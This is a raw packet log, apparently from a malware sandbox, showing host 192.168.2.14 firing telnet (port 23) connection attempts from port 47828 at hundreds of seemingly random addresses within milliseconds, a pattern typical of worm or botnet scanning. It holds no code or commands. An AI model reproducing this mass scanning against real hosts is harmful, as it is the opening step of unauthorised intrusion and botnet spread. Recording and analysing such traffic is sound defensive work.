                                              Nov 23, 2023 05:14:51.003524065 CET4782823192.168.2.14190.169.125.158
                                              Nov 23, 2023 05:14:51.003531933 CET4782823192.168.2.1443.76.122.72
                                              Nov 23, 2023 05:14:51.003541946 CET4782823192.168.2.144.91.30.210
                                              Nov 23, 2023 05:14:51.003542900 CET4782823192.168.2.14124.242.47.3
                                              Nov 23, 2023 05:14:51.003542900 CET4782823192.168.2.14169.75.234.107
                                              Nov 23, 2023 05:14:51.003546953 CET4782823192.168.2.1441.123.25.249
                                              Nov 23, 2023 05:14:51.003566980 CET4782823192.168.2.1492.85.5.149
                                              Nov 23, 2023 05:14:51.003566980 CET4782823192.168.2.144.139.183.217
                                              Nov 23, 2023 05:14:51.003576994 CET4782823192.168.2.14104.130.223.124
                                              Nov 23, 2023 05:14:51.003582001 CET4782823192.168.2.14194.125.53.104
                                              Nov 23, 2023 05:14:51.003582954 CET4782823192.168.2.1462.236.14.87
                                              Nov 23, 2023 05:14:51.003585100 CET4782823192.168.2.14123.88.159.95
                                              Nov 23, 2023 05:14:51.003597975 CET4782823192.168.2.14208.172.91.40
                                              Nov 23, 2023 05:14:51.003607035 CET4782823192.168.2.14110.195.3.136
                                              Nov 23, 2023 05:14:51.003608942 CET4782823192.168.2.1420.251.119.124
                                              Nov 23, 2023 05:14:51.003624916 CET4782823192.168.2.14202.230.240.38
                                              Nov 23, 2023 05:14:51.003626108 CET4782823192.168.2.1431.102.146.106
                                              Nov 23, 2023 05:14:51.003628016 CET4782823192.168.2.1440.82.14.167
                                              Nov 23, 2023 05:14:51.003647089 CET4782823192.168.2.14153.142.126.91
                                              Nov 23, 2023 05:14:51.003653049 CET4782823192.168.2.1412.212.158.78
                                              Nov 23, 2023 05:14:51.003662109 CET4782823192.168.2.14152.111.151.149
                                              Nov 23, 2023 05:14:51.003662109 CET4782823192.168.2.14152.57.11.216
                                              Nov 23, 2023 05:14:51.003678083 CET4782823192.168.2.149.92.122.67
                                              Nov 23, 2023 05:14:51.003681898 CET4782823192.168.2.14125.56.185.243
                                              Nov 23, 2023 05:14:51.003695011 CET4782823192.168.2.14192.33.255.87
                                              Nov 23, 2023 05:14:51.003695011 CET4782823192.168.2.1448.94.255.243
                                              Nov 23, 2023 05:14:51.003705025 CET4782823192.168.2.1424.97.143.62
                                              Nov 23, 2023 05:14:51.003709078 CET4782823192.168.2.1461.216.108.1
                                              Nov 23, 2023 05:14:51.003715992 CET4782823192.168.2.1467.195.203.102
                                              Nov 23, 2023 05:14:51.003716946 CET4782823192.168.2.14103.136.116.81
                                              Nov 23, 2023 05:14:51.003716946 CET4782823192.168.2.1417.178.133.57
                                              Nov 23, 2023 05:14:51.003729105 CET4782823192.168.2.14173.191.91.49
                                              Nov 23, 2023 05:14:51.003730059 CET4782823192.168.2.1461.46.183.244
                                              Nov 23, 2023 05:14:51.003736973 CET4782823192.168.2.1423.181.8.124
                                              Nov 23, 2023 05:14:51.003739119 CET4782823192.168.2.14240.252.141.97
                                              Nov 23, 2023 05:14:51.003756046 CET4782823192.168.2.14191.78.99.222
                                              Nov 23, 2023 05:14:51.003758907 CET4782823192.168.2.1499.48.214.203
                                              Nov 23, 2023 05:14:51.003765106 CET4782823192.168.2.1480.8.32.107
                                              Nov 23, 2023 05:14:51.003770113 CET4782823192.168.2.1484.201.17.218
                                              Nov 23, 2023 05:14:51.003776073 CET4782823192.168.2.14168.189.126.43
                                              Nov 23, 2023 05:14:51.003777981 CET4782823192.168.2.1462.206.215.21
                                              Nov 23, 2023 05:14:51.003784895 CET4782823192.168.2.14244.156.236.49
                                              Nov 23, 2023 05:14:51.003787994 CET4782823192.168.2.1439.89.30.28
                                              Nov 23, 2023 05:14:51.003793001 CET4782823192.168.2.14250.238.123.169
                                              Nov 23, 2023 05:14:51.003798962 CET4782823192.168.2.14182.15.198.110
                                              Nov 23, 2023 05:14:51.003813982 CET4782823192.168.2.14100.43.86.233
                                              Nov 23, 2023 05:14:51.003815889 CET4782823192.168.2.14210.109.161.78
                                              Nov 23, 2023 05:14:51.003833055 CET4782823192.168.2.14166.8.24.187
                                              Nov 23, 2023 05:14:51.003833055 CET4782823192.168.2.14173.144.238.75
                                              Nov 23, 2023 05:14:51.003833055 CET4782823192.168.2.1413.240.165.56
                                              Nov 23, 2023 05:14:51.003843069 CET4782823192.168.2.14145.222.203.208
                                              Nov 23, 2023 05:14:51.003843069 CET4782823192.168.2.144.51.25.175
                                              Nov 23, 2023 05:14:51.003853083 CET4782823192.168.2.14106.22.197.164
                                              Nov 23, 2023 05:14:51.003854036 CET4782823192.168.2.1474.88.56.254
                                              Nov 23, 2023 05:14:51.003863096 CET4782823192.168.2.14102.83.6.58
                                              Nov 23, 2023 05:14:51.003866911 CET4782823192.168.2.1470.225.62.143
                                              Nov 23, 2023 05:14:51.003878117 CET4782823192.168.2.14135.145.103.132
                                              Nov 23, 2023 05:14:51.003889084 CET4782823192.168.2.14161.160.12.126
                                              Nov 23, 2023 05:14:51.003905058 CET4782823192.168.2.14117.34.189.68
                                              Nov 23, 2023 05:14:51.003905058 CET4782823192.168.2.14180.46.79.223
                                              Nov 23, 2023 05:14:51.003911018 CET4782823192.168.2.14121.243.135.151
                                              Nov 23, 2023 05:14:51.003920078 CET4782823192.168.2.14182.227.106.132
                                              Nov 23, 2023 05:14:51.003921032 CET4782823192.168.2.14109.109.78.197
                                              Nov 23, 2023 05:14:51.003930092 CET4782823192.168.2.14249.185.75.107
                                              Nov 23, 2023 05:14:51.003938913 CET4782823192.168.2.14172.81.22.38
                                              Nov 23, 2023 05:14:51.003942966 CET4782823192.168.2.14248.229.156.20
                                              Nov 23, 2023 05:14:51.003945112 CET4782823192.168.2.142.58.207.113
                                              Nov 23, 2023 05:14:51.003951073 CET4782823192.168.2.14177.29.94.21
                                              Nov 23, 2023 05:14:51.003958941 CET4782823192.168.2.1466.13.210.251
                                              Nov 23, 2023 05:14:51.003966093 CET4782823192.168.2.1414.151.25.129
                                              Nov 23, 2023 05:14:51.003972054 CET4782823192.168.2.1478.92.74.196
                                              Nov 23, 2023 05:14:51.003978014 CET4782823192.168.2.14140.237.189.182
                                              Nov 23, 2023 05:14:51.003994942 CET4782823192.168.2.14241.8.18.111
                                              Nov 23, 2023 05:14:51.004003048 CET4782823192.168.2.14221.116.187.13
                                              Nov 23, 2023 05:14:51.004019976 CET4782823192.168.2.1488.252.254.22
                                              Nov 23, 2023 05:14:51.004019976 CET4782823192.168.2.14102.160.220.247
                                              Nov 23, 2023 05:14:51.004034042 CET4782823192.168.2.1458.81.157.94
                                              Nov 23, 2023 05:14:51.004038095 CET4782823192.168.2.14208.63.247.212
                                              Nov 23, 2023 05:14:51.004038095 CET4782823192.168.2.14241.183.178.164
                                              Nov 23, 2023 05:14:51.004041910 CET4782823192.168.2.14135.153.103.20
                                              Nov 23, 2023 05:14:51.004043102 CET4782823192.168.2.14178.30.190.220
                                              Nov 23, 2023 05:14:51.004049063 CET4782823192.168.2.14248.143.49.92
                                              Nov 23, 2023 05:14:51.004057884 CET4782823192.168.2.14186.220.85.78
                                              Nov 23, 2023 05:14:51.004074097 CET4782823192.168.2.14152.86.17.2
                                              Nov 23, 2023 05:14:51.004074097 CET4782823192.168.2.14164.165.89.117
                                              Nov 23, 2023 05:14:51.004081011 CET4782823192.168.2.14250.235.136.99
                                              Nov 23, 2023 05:14:51.004102945 CET4782823192.168.2.14206.111.51.105
                                              Nov 23, 2023 05:14:51.004112959 CET4782823192.168.2.14118.163.153.182
                                              Nov 23, 2023 05:14:51.004112959 CET4782823192.168.2.1448.124.102.119
                                              Nov 23, 2023 05:14:51.004112959 CET4782823192.168.2.1424.36.156.219
                                              Nov 23, 2023 05:14:51.004122019 CET4782823192.168.2.1474.212.201.222
                                              Nov 23, 2023 05:14:51.004125118 CET4782823192.168.2.14157.125.51.214
                                              Nov 23, 2023 05:14:51.004127026 CET4782823192.168.2.14161.209.130.64
                                              Nov 23, 2023 05:14:51.004127979 CET4782823192.168.2.14253.202.59.70
                                              Nov 23, 2023 05:14:51.004132032 CET4782823192.168.2.14161.62.117.137
                                              Nov 23, 2023 05:14:51.004132032 CET4782823192.168.2.14120.79.244.99
                                              Nov 23, 2023 05:14:51.004132032 CET4782823192.168.2.14178.195.219.243
                                              Nov 23, 2023 05:14:51.004137039 CET4782823192.168.2.1490.45.226.188
                                              Nov 23, 2023 05:14:51.004137039 CET4782823192.168.2.14186.213.71.201
                                              Nov 23, 2023 05:14:51.004141092 CET4782823192.168.2.14181.147.141.120
                                              Nov 23, 2023 05:14:51.004149914 CET4782823192.168.2.14145.80.231.254
                                              Nov 23, 2023 05:14:51.004159927 CET4782823192.168.2.14115.38.246.151
                                              Nov 23, 2023 05:14:51.004160881 CET4782823192.168.2.14135.186.135.143
                                              Nov 23, 2023 05:14:51.004163027 CET4782823192.168.2.14167.61.0.162
                                              Nov 23, 2023 05:14:51.004167080 CET4782823192.168.2.14203.161.215.91
                                              Nov 23, 2023 05:14:51.004180908 CET4782823192.168.2.14175.144.80.60
                                              Nov 23, 2023 05:14:51.004193068 CET4782823192.168.2.14176.120.153.182
                                              Nov 23, 2023 05:14:51.004206896 CET4782823192.168.2.14183.248.43.81
                                              Nov 23, 2023 05:14:51.004209995 CET4782823192.168.2.14163.0.37.51
                                              Nov 23, 2023 05:14:51.004215002 CET4782823192.168.2.14194.18.227.94
                                              Nov 23, 2023 05:14:51.004232883 CET4782823192.168.2.1487.244.214.100
                                              Nov 23, 2023 05:14:51.004235029 CET4782823192.168.2.14186.149.254.126
                                              Nov 23, 2023 05:14:51.004251003 CET4782823192.168.2.1471.72.249.250
                                              Nov 23, 2023 05:14:51.004251003 CET4782823192.168.2.1487.93.180.206
                                              Nov 23, 2023 05:14:51.004264116 CET4782823192.168.2.14189.55.189.180
                                              Nov 23, 2023 05:14:51.004266024 CET4782823192.168.2.1438.169.9.35
                                              Nov 23, 2023 05:14:51.004266977 CET4782823192.168.2.14220.231.225.246
                                              Nov 23, 2023 05:14:51.004267931 CET4782823192.168.2.14168.170.49.77
                                              Nov 23, 2023 05:14:51.004278898 CET4782823192.168.2.14158.250.146.236
                                              Nov 23, 2023 05:14:51.004281998 CET4782823192.168.2.1414.169.249.95
                                              Nov 23, 2023 05:14:51.004297018 CET4782823192.168.2.14175.104.37.50
                                              Nov 23, 2023 05:14:51.004297972 CET4782823192.168.2.14133.235.231.187
                                              Nov 23, 2023 05:14:51.004297972 CET4782823192.168.2.1431.234.248.187
                                              Nov 23, 2023 05:14:51.004300117 CET4782823192.168.2.14170.223.45.163
                                              Nov 23, 2023 05:14:51.004313946 CET4782823192.168.2.14145.17.197.196
                                              Nov 23, 2023 05:14:51.004328012 CET4782823192.168.2.1482.201.30.147
                                              Nov 23, 2023 05:14:51.004333973 CET4782823192.168.2.14185.25.86.177
                                              Nov 23, 2023 05:14:51.004344940 CET4782823192.168.2.14111.152.186.119
                                              Nov 23, 2023 05:14:51.004347086 CET4782823192.168.2.14244.253.170.88
                                              Nov 23, 2023 05:14:51.004349947 CET4782823192.168.2.14178.200.239.23
                                              Nov 23, 2023 05:14:51.004358053 CET4782823192.168.2.14115.77.166.139
                                              Nov 23, 2023 05:14:51.004363060 CET4782823192.168.2.1495.78.136.51
                                              Nov 23, 2023 05:14:51.004375935 CET4782823192.168.2.1457.38.246.200
                                              Nov 23, 2023 05:14:51.004379034 CET4782823192.168.2.1498.76.84.164
                                              Nov 23, 2023 05:14:51.004391909 CET4782823192.168.2.1447.0.250.181
                                              Nov 23, 2023 05:14:51.004398108 CET4782823192.168.2.1445.19.92.22
                                              Nov 23, 2023 05:14:51.004398108 CET4782823192.168.2.1431.250.232.158
                                              Nov 23, 2023 05:14:51.004400969 CET4782823192.168.2.14203.185.33.155
                                              Nov 23, 2023 05:14:51.004404068 CET4782823192.168.2.14251.183.71.10
                                              Nov 23, 2023 05:14:51.004416943 CET4782823192.168.2.1414.6.125.134
                                              Nov 23, 2023 05:14:51.004422903 CET4782823192.168.2.1468.101.3.19
                                              Nov 23, 2023 05:14:51.004442930 CET4782823192.168.2.14248.56.139.129
                                              Nov 23, 2023 05:14:51.004451990 CET4782823192.168.2.14115.57.195.3
                                              Nov 23, 2023 05:14:51.004453897 CET4782823192.168.2.14159.74.251.165
                                              Nov 23, 2023 05:14:51.004456043 CET4782823192.168.2.14197.92.157.202
                                              Nov 23, 2023 05:14:51.004463911 CET4782823192.168.2.14169.81.123.117
                                              Nov 23, 2023 05:14:51.004466057 CET4782823192.168.2.14118.36.23.213
                                              Nov 23, 2023 05:14:51.004467010 CET4782823192.168.2.14246.20.136.158
                                              Nov 23, 2023 05:14:51.004467964 CET4782823192.168.2.1464.241.68.97
                                              Nov 23, 2023 05:14:51.004482031 CET4782823192.168.2.14120.44.64.200
                                              Nov 23, 2023 05:14:51.004482031 CET4782823192.168.2.14165.172.202.168
                                              Nov 23, 2023 05:14:51.004487991 CET4782823192.168.2.1434.197.185.253
                                              Nov 23, 2023 05:14:51.004504919 CET4782823192.168.2.14124.200.131.98
                                              Nov 23, 2023 05:14:51.004507065 CET4782823192.168.2.14115.3.228.14
                                              Nov 23, 2023 05:14:51.004507065 CET4782823192.168.2.14144.60.207.181
                                              Nov 23, 2023 05:14:51.004515886 CET4782823192.168.2.14174.67.3.140
                                              Nov 23, 2023 05:14:51.004522085 CET4782823192.168.2.14156.55.87.156
                                              Nov 23, 2023 05:14:51.004522085 CET4782823192.168.2.1446.43.251.7
                                              Nov 23, 2023 05:14:51.004534006 CET4782823192.168.2.1453.201.130.63
                                              Nov 23, 2023 05:14:51.004534006 CET4782823192.168.2.14216.26.9.118
                                              Nov 23, 2023 05:14:51.004535913 CET4782823192.168.2.14107.167.95.139
                                              Nov 23, 2023 05:14:51.004538059 CET4782823192.168.2.1478.226.246.133
                                              Nov 23, 2023 05:14:51.004551888 CET4782823192.168.2.1476.63.156.143
                                              Nov 23, 2023 05:14:51.004553080 CET4782823192.168.2.14252.199.127.109
                                              Nov 23, 2023 05:14:51.004553080 CET4782823192.168.2.14172.95.216.185
                                              Nov 23, 2023 05:14:51.004553080 CET4782823192.168.2.14170.206.35.236
                                              Nov 23, 2023 05:14:51.004569054 CET4782823192.168.2.1469.241.52.103
                                              Nov 23, 2023 05:14:51.004571915 CET4782823192.168.2.14162.7.54.128
                                              Nov 23, 2023 05:14:51.004581928 CET4782823192.168.2.1471.217.146.21
                                              Nov 23, 2023 05:14:51.004586935 CET4782823192.168.2.1466.172.248.164
                                              Nov 23, 2023 05:14:51.004592896 CET4782823192.168.2.1461.98.176.173
                                              Nov 23, 2023 05:14:51.004600048 CET4782823192.168.2.14192.25.66.253
                                              Nov 23, 2023 05:14:51.004611015 CET4782823192.168.2.14197.204.28.199
                                              Nov 23, 2023 05:14:51.004611969 CET4782823192.168.2.1490.114.43.188
                                              Nov 23, 2023 05:14:51.004617929 CET4782823192.168.2.1414.187.11.144
                                              Nov 23, 2023 05:14:51.004617929 CET4782823192.168.2.14179.102.15.113
                                              Nov 23, 2023 05:14:51.004622936 CET4782823192.168.2.14123.14.238.102
                                              Nov 23, 2023 05:14:51.004622936 CET4782823192.168.2.14122.38.233.155
                                              Nov 23, 2023 05:14:51.004641056 CET4782823192.168.2.14206.10.130.102
                                              Nov 23, 2023 05:14:51.004641056 CET4782823192.168.2.14188.107.168.42
                                              Nov 23, 2023 05:14:51.004642010 CET4782823192.168.2.14108.133.167.166
                                              Nov 23, 2023 05:14:51.004642010 CET4782823192.168.2.14246.114.133.245
                                              Nov 23, 2023 05:14:51.004653931 CET4782823192.168.2.14166.113.10.220
                                              Nov 23, 2023 05:14:51.004657984 CET4782823192.168.2.1473.71.113.86
                                              Nov 23, 2023 05:14:51.004662991 CET4782823192.168.2.14153.148.111.53
                                              Nov 23, 2023 05:14:51.004663944 CET4782823192.168.2.14254.132.18.141
                                              Nov 23, 2023 05:14:51.004676104 CET4782823192.168.2.14197.152.94.68
                                              Nov 23, 2023 05:14:51.004682064 CET4782823192.168.2.14184.141.220.34
                                              Nov 23, 2023 05:14:51.004682064 CET4782823192.168.2.148.199.176.127
                                              Nov 23, 2023 05:14:51.004695892 CET4782823192.168.2.14184.45.208.4
                                              Nov 23, 2023 05:14:51.004702091 CET4782823192.168.2.1459.137.133.245
                                              Nov 23, 2023 05:14:51.004719019 CET4782823192.168.2.14244.40.174.140
                                              Nov 23, 2023 05:14:51.004719019 CET4782823192.168.2.14111.186.222.253
                                              Nov 23, 2023 05:14:51.004719019 CET4782823192.168.2.1461.119.42.186
                                              Nov 23, 2023 05:14:51.004734039 CET4782823192.168.2.14191.92.131.145
                                              Nov 23, 2023 05:14:51.004734993 CET4782823192.168.2.14122.163.133.207
                                              Nov 23, 2023 05:14:51.004745007 CET4782823192.168.2.1465.196.26.183
                                              Nov 23, 2023 05:14:51.004753113 CET4782823192.168.2.1465.94.68.142
                                              Nov 23, 2023 05:14:51.004753113 CET4782823192.168.2.14168.220.0.139
                                              Nov 23, 2023 05:14:51.004759073 CET4782823192.168.2.14148.159.29.110
                                              Nov 23, 2023 05:14:51.004770994 CET4782823192.168.2.14241.85.164.192
                                              Nov 23, 2023 05:14:51.004775047 CET4782823192.168.2.14222.210.7.187
                                              Nov 23, 2023 05:14:51.004786015 CET4782823192.168.2.14106.88.18.25
                                              Nov 23, 2023 05:14:51.004796028 CET4782823192.168.2.14210.35.37.117
                                              Nov 23, 2023 05:14:51.004800081 CET4782823192.168.2.14219.238.138.63
                                              Nov 23, 2023 05:14:51.004800081 CET4782823192.168.2.14161.12.218.254
                                              Nov 23, 2023 05:14:51.004800081 CET4782823192.168.2.14211.143.210.48
                                              Nov 23, 2023 05:14:51.004811049 CET4782823192.168.2.14136.232.242.107
                                              Nov 23, 2023 05:14:51.004818916 CET4782823192.168.2.1420.21.85.103
                                              Nov 23, 2023 05:14:51.004836082 CET4782823192.168.2.14221.70.18.196
                                              Nov 23, 2023 05:14:51.004837036 CET4782823192.168.2.14252.127.158.104
                                              Nov 23, 2023 05:14:51.004842997 CET4782823192.168.2.14164.63.178.254
                                              Nov 23, 2023 05:14:51.004851103 CET4782823192.168.2.14194.11.63.163
                                              Nov 23, 2023 05:14:51.004851103 CET4782823192.168.2.14195.80.116.97
                                              Nov 23, 2023 05:14:51.004851103 CET4782823192.168.2.14113.66.9.45
                                              Nov 23, 2023 05:14:51.004858971 CET4782823192.168.2.14121.46.221.200
                                              Nov 23, 2023 05:14:51.004867077 CET4782823192.168.2.14121.76.245.134
                                              Nov 23, 2023 05:14:51.004878044 CET4782823192.168.2.14115.4.238.237
                                              Nov 23, 2023 05:14:51.004887104 CET4782823192.168.2.14125.239.15.200
                                              Nov 23, 2023 05:14:51.004889965 CET4782823192.168.2.14244.184.186.7
                                              Nov 23, 2023 05:14:51.004899025 CET4782823192.168.2.14173.177.224.28
                                              Nov 23, 2023 05:14:51.004908085 CET4782823192.168.2.1492.245.232.203
                                              Nov 23, 2023 05:14:51.004925013 CET4782823192.168.2.1475.117.9.58
                                              Nov 23, 2023 05:14:51.004925013 CET4782823192.168.2.14195.105.171.20
                                              Nov 23, 2023 05:14:51.004930973 CET4782823192.168.2.14102.115.151.234
                                              Nov 23, 2023 05:14:51.004934072 CET4782823192.168.2.1458.45.25.32
                                              Nov 23, 2023 05:14:51.004945993 CET4782823192.168.2.1473.236.198.197
                                              Nov 23, 2023 05:14:51.004964113 CET4782823192.168.2.14152.127.182.101
                                              Nov 23, 2023 05:14:51.004964113 CET4782823192.168.2.14110.46.83.64
                                              Nov 23, 2023 05:14:51.004964113 CET4782823192.168.2.14102.96.215.2
                                              Nov 23, 2023 05:14:51.004978895 CET4782823192.168.2.14125.246.114.168
                                              Nov 23, 2023 05:14:51.004980087 CET4782823192.168.2.1491.153.162.153
                                              Nov 23, 2023 05:14:51.004988909 CET4782823192.168.2.1431.3.40.186
                                              Nov 23, 2023 05:14:51.004996061 CET4782823192.168.2.14106.109.160.111
                                              Nov 23, 2023 05:14:51.004997969 CET4782823192.168.2.1458.31.2.2
                                              Nov 23, 2023 05:14:51.005001068 CET4782823192.168.2.1496.203.158.203
                                              Nov 23, 2023 05:14:51.005006075 CET4782823192.168.2.14119.20.10.174
                                              Nov 23, 2023 05:14:51.005013943 CET4782823192.168.2.1447.132.34.253
                                              Nov 23, 2023 05:14:51.005016088 CET4782823192.168.2.14213.80.67.20
                                              Nov 23, 2023 05:14:51.005017996 CET4782823192.168.2.14182.57.209.178
                                              Nov 23, 2023 05:14:51.005028963 CET4782823192.168.2.14199.12.226.163
                                              Nov 23, 2023 05:14:51.005047083 CET4782823192.168.2.14142.156.138.25
                                              Nov 23, 2023 05:14:51.005054951 CET4782823192.168.2.14103.39.113.74
                                              Nov 23, 2023 05:14:51.005068064 CET4782823192.168.2.1432.176.101.68
                                              Nov 23, 2023 05:14:51.005073071 CET4782823192.168.2.14189.8.95.34
                                              Nov 23, 2023 05:14:51.005080938 CET4782823192.168.2.1424.139.189.32
                                              Nov 23, 2023 05:14:51.005089045 CET4782823192.168.2.14168.13.159.53
                                              Nov 23, 2023 05:14:51.005099058 CET4782823192.168.2.14124.129.100.53
                                              Nov 23, 2023 05:14:51.005110025 CET4782823192.168.2.14139.242.36.39
                                              Nov 23, 2023 05:14:51.005110979 CET4782823192.168.2.1435.222.192.121
                                              Nov 23, 2023 05:14:51.005110979 CET4782823192.168.2.14251.86.134.89
                                              Nov 23, 2023 05:14:51.005110979 CET4782823192.168.2.14204.247.166.210
                                              Nov 23, 2023 05:14:51.005126953 CET4782823192.168.2.14154.227.7.218
                                              Nov 23, 2023 05:14:51.005129099 CET4782823192.168.2.1467.8.161.100
                                              Nov 23, 2023 05:14:51.005137920 CET4782823192.168.2.1453.6.154.228
                                              Nov 23, 2023 05:14:51.005162001 CET4782823192.168.2.14183.24.156.25
                                              Nov 23, 2023 05:14:51.005162954 CET4782823192.168.2.14240.87.14.38
                                              Nov 23, 2023 05:14:51.005166054 CET4782823192.168.2.14110.117.199.152
                                              Nov 23, 2023 05:14:51.005167961 CET4782823192.168.2.14163.80.188.234
                                              Nov 23, 2023 05:14:51.005167961 CET4782823192.168.2.1498.86.235.27
                                              Nov 23, 2023 05:14:51.005171061 CET4782823192.168.2.14105.173.59.249
                                              Nov 23, 2023 05:14:51.005173922 CET4782823192.168.2.14205.191.225.219
                                              Nov 23, 2023 05:14:51.005177021 CET4782823192.168.2.14185.52.123.71
                                              Nov 23, 2023 05:14:51.005196095 CET4782823192.168.2.14153.75.170.148
                                              Nov 23, 2023 05:14:51.005197048 CET4782823192.168.2.14181.92.153.85
                                              Nov 23, 2023 05:14:51.005198956 CET4782823192.168.2.14182.190.204.82
                                              Nov 23, 2023 05:14:51.005208015 CET4782823192.168.2.14115.106.26.23
                                              Nov 23, 2023 05:14:51.005208969 CET4782823192.168.2.14186.161.245.148
                                              Nov 23, 2023 05:14:51.005208969 CET4782823192.168.2.14242.56.167.155
                                              Nov 23, 2023 05:14:51.005209923 CET4782823192.168.2.1495.236.202.205
                                              Nov 23, 2023 05:14:51.005220890 CET4782823192.168.2.14220.60.241.221
                                              Nov 23, 2023 05:14:51.005222082 CET4782823192.168.2.1468.163.86.116
                                              Nov 23, 2023 05:14:51.005229950 CET4782823192.168.2.1443.58.103.52
                                              Nov 23, 2023 05:14:51.005232096 CET4782823192.168.2.14163.37.104.191
                                              Nov 23, 2023 05:14:51.005254030 CET4782823192.168.2.14164.182.21.178
                                              Nov 23, 2023 05:14:51.005255938 CET4782823192.168.2.14243.88.125.238
                                              Nov 23, 2023 05:14:51.005255938 CET4782823192.168.2.14245.196.8.61
                                              Nov 23, 2023 05:14:51.005265951 CET4782823192.168.2.14194.200.136.254
                                              Nov 23, 2023 05:14:51.005275965 CET4782823192.168.2.1438.63.24.208
                                              Nov 23, 2023 05:14:51.005276918 CET4782823192.168.2.14107.189.12.9
                                              Nov 23, 2023 05:14:51.005285978 CET4782823192.168.2.14240.228.231.242
                                              Nov 23, 2023 05:14:51.005300045 CET4782823192.168.2.14110.234.65.250
                                              Nov 23, 2023 05:14:51.005302906 CET4782823192.168.2.14109.13.111.173
                                              Nov 23, 2023 05:14:51.005305052 CET4782823192.168.2.1468.180.247.145
                                              Nov 23, 2023 05:14:51.005309105 CET4782823192.168.2.14148.161.211.45
                                              Nov 23, 2023 05:14:51.005317926 CET4782823192.168.2.14194.90.191.29
                                              Nov 23, 2023 05:14:51.005321980 CET4782823192.168.2.14169.178.234.70
                                              Nov 23, 2023 05:14:51.005331993 CET4782823192.168.2.1446.204.130.46
                                              Nov 23, 2023 05:14:51.005337000 CET4782823192.168.2.14139.168.174.124
                                              Nov 23, 2023 05:14:51.005342960 CET4782823192.168.2.1457.53.91.193
                                              Nov 23, 2023 05:14:51.005351067 CET4782823192.168.2.14149.195.5.182
                                              Nov 23, 2023 05:14:51.005357981 CET4782823192.168.2.1461.82.57.84
                                              Nov 23, 2023 05:14:51.005368948 CET4782823192.168.2.14172.249.167.69
                                              Nov 23, 2023 05:14:51.005368948 CET4782823192.168.2.14149.172.154.3
                                              Nov 23, 2023 05:14:51.005373955 CET4782823192.168.2.14208.205.55.13
                                              Nov 23, 2023 05:14:51.005378008 CET4782823192.168.2.14152.241.124.174
                                              Nov 23, 2023 05:14:51.005384922 CET4782823192.168.2.1418.26.200.155
                                              Nov 23, 2023 05:14:51.005390882 CET4782823192.168.2.1416.14.247.231
                                              Nov 23, 2023 05:14:51.005394936 CET4782823192.168.2.14250.45.215.118
                                              Nov 23, 2023 05:14:51.005410910 CET4782823192.168.2.1470.248.74.241
                                              Nov 23, 2023 05:14:51.005413055 CET4782823192.168.2.1434.84.119.54
                                              Nov 23, 2023 05:14:51.005422115 CET4782823192.168.2.1435.21.210.169
                                              Nov 23, 2023 05:14:51.005434990 CET4782823192.168.2.1487.206.1.220
                                              Nov 23, 2023 05:14:51.005441904 CET4782823192.168.2.1489.63.240.8
                                              Nov 23, 2023 05:14:51.005450010 CET4782823192.168.2.14136.71.49.80
                                              Nov 23, 2023 05:14:51.005464077 CET4782823192.168.2.1477.33.217.122
                                              Nov 23, 2023 05:14:51.005470037 CET4782823192.168.2.14179.166.9.160
                                              Nov 23, 2023 05:14:51.005471945 CET4782823192.168.2.1416.244.2.54
                                              Nov 23, 2023 05:14:51.005480051 CET4782823192.168.2.14220.215.6.211
                                              Nov 23, 2023 05:14:51.005481005 CET4782823192.168.2.1442.84.27.227
                                              Nov 23, 2023 05:14:51.005481005 CET4782823192.168.2.14142.40.76.128
                                              Nov 23, 2023 05:14:51.005491018 CET4782823192.168.2.14241.140.106.164
                                              Nov 23, 2023 05:14:51.005494118 CET4782823192.168.2.14218.47.8.132
                                              Nov 23, 2023 05:14:51.005510092 CET4782823192.168.2.14187.102.137.47
                                              Nov 23, 2023 05:14:51.005510092 CET4782823192.168.2.1442.31.182.62
                                              Nov 23, 2023 05:14:51.005515099 CET4782823192.168.2.14110.183.195.38
                                              Nov 23, 2023 05:14:51.005515099 CET4782823192.168.2.14179.25.192.195
                                              Nov 23, 2023 05:14:51.005528927 CET4782823192.168.2.1459.169.4.229
                                              Nov 23, 2023 05:14:51.005534887 CET4782823192.168.2.14223.99.65.113
                                              Nov 23, 2023 05:14:51.005534887 CET4782823192.168.2.14103.15.13.99
                                              Nov 23, 2023 05:14:51.005538940 CET4782823192.168.2.14165.179.249.198
                                              Nov 23, 2023 05:14:51.005546093 CET4782823192.168.2.1414.197.142.111
                                              Nov 23, 2023 05:14:51.005589962 CET4782823192.168.2.14240.58.213.142
                                              Nov 23, 2023 05:14:51.005590916 CET4782823192.168.2.14240.111.147.218
                                              Nov 23, 2023 05:14:51.005595922 CET4782823192.168.2.14182.209.244.174
                                              Nov 23, 2023 05:14:51.005604982 CET4782823192.168.2.14246.137.225.77
                                              Nov 23, 2023 05:14:51.005614996 CET4782823192.168.2.1448.110.227.133
                                              Nov 23, 2023 05:14:51.005615950 CET4782823192.168.2.14170.3.237.45
                                              Nov 23, 2023 05:14:51.005634069 CET4782823192.168.2.14171.67.116.114
                                              Nov 23, 2023 05:14:51.005636930 CET4782823192.168.2.1416.147.116.79
                                              Nov 23, 2023 05:14:51.005640984 CET4782823192.168.2.1489.154.192.177
                                              Nov 23, 2023 05:14:51.005650043 CET4782823192.168.2.14123.198.28.136
                                              Nov 23, 2023 05:14:51.005656004 CET4782823192.168.2.14191.128.8.149
                                              Nov 23, 2023 05:14:51.005665064 CET4782823192.168.2.14242.135.69.45
                                              Nov 23, 2023 05:14:51.005673885 CET4782823192.168.2.14255.153.24.19
                                              Nov 23, 2023 05:14:51.005678892 CET4782823192.168.2.14152.47.87.247
                                              Nov 23, 2023 05:14:51.005682945 CET4782823192.168.2.14241.235.201.96
                                              Nov 23, 2023 05:14:51.005685091 CET4782823192.168.2.14246.53.51.213
                                              Nov 23, 2023 05:14:51.005691051 CET4782823192.168.2.14244.160.117.7
                                              Nov 23, 2023 05:14:51.005705118 CET4782823192.168.2.1494.168.122.231
                                              Nov 23, 2023 05:14:51.005719900 CET4782823192.168.2.14208.235.135.11
                                              Nov 23, 2023 05:14:51.005727053 CET4782823192.168.2.1462.114.94.66
                                              Nov 23, 2023 05:14:51.005738974 CET4782823192.168.2.1441.39.94.245
                                              Nov 23, 2023 05:14:51.005740881 CET4782823192.168.2.1468.199.157.119
                                              Nov 23, 2023 05:14:51.005764008 CET4782823192.168.2.14182.204.40.239
                                              Nov 23, 2023 05:14:51.005778074 CET4782823192.168.2.1431.152.77.132
                                              Nov 23, 2023 05:14:51.005783081 CET4782823192.168.2.14251.41.155.152
                                              Nov 23, 2023 05:14:51.005784035 CET4782823192.168.2.14251.103.75.233
